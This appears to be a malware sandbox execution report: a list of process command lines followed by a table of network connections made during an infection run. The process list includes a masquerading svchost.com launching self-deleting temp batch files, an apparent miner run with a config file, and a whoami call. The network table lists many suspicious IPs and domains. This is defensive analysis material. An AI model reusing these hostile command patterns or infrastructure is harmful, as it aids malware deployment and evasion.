"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=2304 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 23775 -prefMapSize 244658 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {c7ac28f1-d6a8-437f-b496-3ca8ff23aaed} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" socket
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=3148 -childID 1 -isForBrowser -prefsHandle 3140 -prefMapHandle 3136 -prefsLen 23916 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {c81dd25a-d764-4715-8d51-f2c689cc3f58} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=3696 -childID 2 -isForBrowser -prefsHandle 3652 -prefMapHandle 3688 -prefsLen 29149 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {0448c56f-727f-4722-8947-1634f3661c45} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5124 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5112 -prefMapHandle 1748 -prefsLen 29337 -prefMapSize 244658 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {330e2f9a-c1f2-482a-aaf3-d76c0d3c435d} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" utility
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4928 /prefetch:2
C:\Users\Admin\AppData\Local\asm\mi.exe
"C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5408 -childID 3 -isForBrowser -prefsHandle 2312 -prefMapHandle 5392 -prefsLen 27190 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {0804809b-f364-4d84-a5e3-a074c3903e1d} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4768 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe --config="C:\Users\Admin\AppData\Local\asm\config.json"
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5504 -childID 4 -isForBrowser -prefsHandle 5512 -prefMapHandle 5392 -prefsLen 27190 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {54d9bf81-1065-42fa-9b13-d6c6e3427570} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2500 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2144 /prefetch:2
C:\Windows\system32\whoami.exe
whoami
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=4236 -childID 5 -isForBrowser -prefsHandle 876 -prefMapHandle 1108 -prefsLen 27380 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {d21cf4fc-4c04-4101-a030-d624ad01546b} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\palladiums\translucently.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE"
C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE
C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\200ebe9e8e08453590aa104a8d12444e /t 3636 /p 3572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 8112 -ip 8112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8112 -s 2320
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\7e9ef29517a347469a2f4f53bc431d0f /t 4088 /p 4060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 8652 -ip 8652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8652 -s 1584
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network4726Man.cmd"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\Network4726Man.cmd
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| N/A | 127.0.0.1:49848 | tcp | |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3434.filelu.cloud | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | irp.cdn-website.com | udp |
| US | 8.8.8.8:53 | kolobrownsalesye-fong.com | udp |
| US | 216.158.238.61:80 | 216.158.238.61 | tcp |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| NL | 95.169.201.100:18960 | tcp | |
| US | 66.165.227.66:80 | 66.165.227.66 | tcp |
| US | 66.165.227.66:80 | 66.165.227.66 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| HK | 43.155.93.125:80 | 43.155.93.125 | tcp |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 123.60.37.61:9999 | tcp | |
| US | 136.0.44.4:8000 | 136.0.44.4 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| ES | 81.42.249.132:1080 | 81.42.249.132 | tcp |
| CN | 183.30.204.105:81 | tcp | |
| CN | 183.30.204.105:81 | tcp | |
| CN | 183.30.204.105:81 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| ES | 81.42.249.132:1080 | 81.42.249.132 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| DE | 49.12.117.119:80 | 49.12.117.119 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| JP | 121.1.252.90:80 | 121.1.252.90 | tcp |
| CN | 114.215.27.238:2324 | tcp | |
| CN | 101.229.61.157:8072 | tcp | |
| CN | 110.90.9.121:8072 | tcp | |
| CN | 114.215.27.238:8072 | tcp | |
| TR | 5.26.97.52:88 | 5.26.97.52 | tcp |
| JP | 122.31.166.101:80 | 122.31.166.101 | tcp |
| CA | 76.11.16.231:80 | 76.11.16.231 | tcp |
| US | 75.18.210.21:80 | 75.18.210.21 | tcp |
| HK | 219.77.72.53:80 | 219.77.72.53 | tcp |
| CA | 99.233.83.22:80 | 99.233.83.22 | tcp |
| CN | 110.40.250.173:2324 | tcp | |
| US | 67.190.47.69:8081 | 67.190.47.69 | tcp |
| CN | 124.70.36.56:80 | tcp | |
| CN | 121.235.184.125:9000 | tcp | |
| CN | 61.183.16.127:14417 | tcp | |
| CN | 58.208.14.94:88 | tcp | |
| TR | 178.242.54.178:88 | 178.242.54.178 | tcp |
| KR | 218.155.74.6:7070 | 218.155.74.6 | tcp |
| CN | 150.158.146.215:80 | tcp | |
| BR | 187.59.102.238:9090 | 187.59.102.238 | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | cdn-downloads.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | dctdownload.s3.amazonaws.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 67.23.237.28:80 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 8.8.8.8:53 | cdn-downloads-now.xyz | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | csg-app.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 198.54.115.214:443 | kolobrownsalesye-fong.com | tcp |
| FR | 99.86.91.47:443 | irp.cdn-website.com | tcp |
| IE | 52.92.2.241:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.218.109.154:443 | dctdownload.s3.amazonaws.com | tcp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| SE | 129.151.210.233:8000 | 129.151.210.233 | tcp |
| US | 8.8.8.8:53 | 139520.aioc.qbgxl.com | udp |
| NL | 4.180.120.64:8000 | 4.180.120.64 | tcp |
| US | 8.8.8.8:53 | 83-87-76-41.cable.dynamic.v4.ziggo.nl | udp |
| CN | 49.234.48.162:80 | tcp | |
| US | 166.167.172.14:8007 | 166.167.172.14 | tcp |
| US | 8.8.8.8:53 | a15aaa1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | down10d.zol.com.cn | udp |
| ES | 47.62.190.226:8081 | 47.62.190.226 | tcp |
| CN | 8.137.59.132:8888 | tcp | |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| MA | 102.53.15.17:80 | 102.53.15.17 | tcp |
| DE | 172.105.66.118:80 | 172.105.66.118 | tcp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| IE | 52.218.109.154:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.218.90.202:443 | dctdownload.s3.amazonaws.com | tcp |
| RU | 89.175.24.90:8080 | 89.175.24.90 | tcp |
| US | 144.34.162.13:80 | 144.34.162.13 | tcp |
| US | 8.8.8.8:53 | www.beiletoys.com | udp |
| US | 8.8.8.8:53 | data.yhydl.com | udp |
| US | 8.8.8.8:53 | casacoimbramaputo.com | udp |
| US | 8.8.8.8:53 | dcwblida.dz | udp |
| CN | 139.159.155.204:81 | tcp | |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.117.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.249.42.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.91.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.2.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.238.158.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.120.180.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.16.11.76.in-addr.arpa | udp |
| HK | 47.79.66.210:443 | a15aaa1.oss-cn-hongkong.aliyuncs.com | tcp |
| NL | 83.87.76.41:80 | 83-87-76-41.cable.dynamic.v4.ziggo.nl | tcp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| US | 209.124.70.44:443 | casacoimbramaputo.com | tcp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| US | 8.8.8.8:53 | 233.210.151.129.in-addr.arpa | udp |
| CN | 61.160.195.64:80 | 139520.aioc.qbgxl.com | tcp |
| US | 8.8.8.8:53 | 22.83.233.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | taodianla.com | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| HK | 134.122.129.20:80 | 134.122.129.20 | tcp |
| US | 8.8.8.8:53 | 28.237.23.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.47.190.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.227.165.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.90.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.210.18.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.115.54.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.190.62.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.93.155.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.45.161.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.24.175.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.72.77.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.102.59.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.252.1.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.166.31.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.74.155.218.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.44.0.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.162.34.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.54.242.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.172.167.166.in-addr.arpa | udp |
| CN | 122.143.2.98:80 | down10d.zol.com.cn | tcp |
| IE | 52.218.63.10:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.218.90.202:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| DE | 172.105.66.118:8080 | tcp | |
| US | 166.167.172.14:8240 | 166.167.172.14 | tcp |
| CN | 112.5.156.15:20006 | data.yhydl.com | tcp |
| CN | 121.40.155.21:80 | www.beiletoys.com | tcp |
| ID | 103.123.98.86:80 | 103.123.98.86 | tcp |
| CN | 47.110.247.171:80 | tcp | |
| US | 8.8.8.8:53 | 41.76.87.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.70.124.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.92.116.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.129.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.63.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| CN | 114.215.27.238:14417 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| DZ | 41.111.143.136:443 | dcwblida.dz | tcp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| HK | 103.68.192.104:80 | taodianla.com | tcp |
| IT | 217.58.56.138:8001 | 217.58.56.138 | tcp |
| CN | 123.60.59.48:80 | tcp | |
| CN | 180.140.124.53:60 | tcp | |
| US | 67.213.59.251:80 | 67.213.59.251 | tcp |
| IE | 52.218.63.10:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.2.25:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | cfs5.tistory.com | udp |
| CN | 139.198.15.223:8080 | tcp | |
| IE | 52.92.2.25:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.32.209:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 86.98.123.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.143.111.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.2.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.56.58.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.187.63.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.59.213.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.32.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.192.68.103.in-addr.arpa | udp |
| CN | 150.158.25.244:9000 | tcp | |
| IE | 52.92.17.233:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.32.209:443 | dctdownload.s3.amazonaws.com | tcp |
| TH | 147.50.240.62:80 | 147.50.240.62 | tcp |
| NL | 185.180.196.46:80 | 185.180.196.46 | tcp |
| KR | 211.231.99.68:80 | cfs5.tistory.com | tcp |
| IE | 52.92.17.233:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.2.241:443 | dctdownload.s3.amazonaws.com | tcp |
| KR | 1.214.192.147:80 | 1.214.192.147 | tcp |
| US | 96.250.166.185:88 | 96.250.166.185 | tcp |
| US | 8.8.8.8:53 | hallowed-noisy.sbs | udp |
| US | 8.8.8.8:53 | plastic-mitten.sbs | udp |
| US | 8.8.8.8:53 | looky-marked.sbs | udp |
| US | 8.8.8.8:53 | 233.17.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.240.50.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.196.180.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.166.250.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wrench-creter.sbs | udp |
| US | 8.8.8.8:53 | slam-whipp.sbs | udp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| US | 8.8.8.8:53 | download.caihong.com | udp |
| US | 8.8.8.8:53 | record-envyp.sbs | udp |
| US | 8.8.8.8:53 | copper-replace.sbs | udp |
| US | 8.8.8.8:53 | osecweb.ir | udp |
| US | 8.8.8.8:53 | savvy-steereo.sbs | udp |
| RU | 176.111.174.138:443 | tcp | |
| IR | 185.79.156.69:80 | osecweb.ir | tcp |
| US | 8.8.8.8:53 | preside-comforter.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | 147.192.214.1.in-addr.arpa | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
